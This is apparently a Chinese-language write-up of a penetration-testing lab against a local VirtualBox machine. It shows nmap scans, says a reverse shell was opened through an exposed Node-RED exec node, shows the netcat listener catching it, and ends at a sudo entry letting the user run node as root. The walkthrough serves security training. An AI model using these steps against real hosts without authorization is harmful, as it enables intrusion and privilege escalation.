┌──(root㉿kali)-[/miaosec] └─# nmap -sn 192.168.2.0/24 Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-13 17:14 CST Nmap scan report for 192.168.2.1 Host is up (0.00055s latency). MAC Address: 0A:00:27:00:00:07 (Unknown) Nmap scan report for 192.168.2.2 Host is up (0.00049s latency). MAC Address: 08:00:27:F6:7B:61 (Oracle VirtualBox virtual NIC) Nmap scan report for sunset.leak.dsz (192.168.2.42) Host is up (0.00053s latency). MAC Address: 08:00:27:7E:CE:00 (Oracle VirtualBox virtual NIC) Nmap scan report for 192.168.2.4 Host is up. Nmap done: 256 IP addresses (4 hosts up) scanned in 2.15 seconds
靶机IP:192.168.2.42
2、端口扫描
1.全端口扫描
1 2 3 4 5 6 7 8 9 10 11 12 13
┌──(root㉿kali)-[/miaosec] └─# nmap --min-rate 10000 -p- 192.168.2.42 Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-13 17:14 CST Nmap scan report for sunset.leak.dsz (192.168.2.42) Host is up (0.00041s latency). Not shown: 65532 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 1880/tcp open vsat-control MAC Address: 08:00:27:7E:CE:00 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 40.44 seconds
┌──(root㉿kali)-[/miaosec] └─# nmap --min-rate 10000 -sT -sV -sC -O -p22,80,1880 192.168.2.42 Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-13 17:15 CST Nmap scan report for sunset.leak.dsz (192.168.2.42) Host is up (0.00084s latency).
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0) | ssh-hostkey: | 3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA) | 256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA) |_ 256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519) 80/tcp open http Apache httpd 2.4.56 ((Debian)) |_http-server-header: Apache/2.4.56 (Debian) |_http-title: Apache2 Debian Default Page: It works 1880/tcp open http Node.js Express framework |_http-cors: GET POST PUT DELETE |_http-title: Node-RED MAC Address: 08:00:27:7E:CE:00 (Oracle VirtualBox virtual NIC) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 4.X|5.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 OS details: Linux 4.15 - 5.8 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 14.04 seconds
二、WEB渗透
1、80网站
访问80端口,是Apache的默认页面
2、1880-Node-RED
访问1880端口,是一个Node-RED
经过测试发现,存在exec功能的节点 直接反弹shell
成功获取到shell
1 2 3 4 5 6
┌──(root㉿kali)-[~] └─# nc -lvnp 4444 listening on [any] 4444 ... connect to [192.168.2.4] from (UNKNOWN) [192.168.2.42] 43348 id uid=1000(dev) gid=1000(dev) grupos=1000(dev)
dev@node:~$ sudo -l Matching Defaults entries for dev on node: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User dev may run the following commands on node: (root) NOPASSWD: /usr/bin/node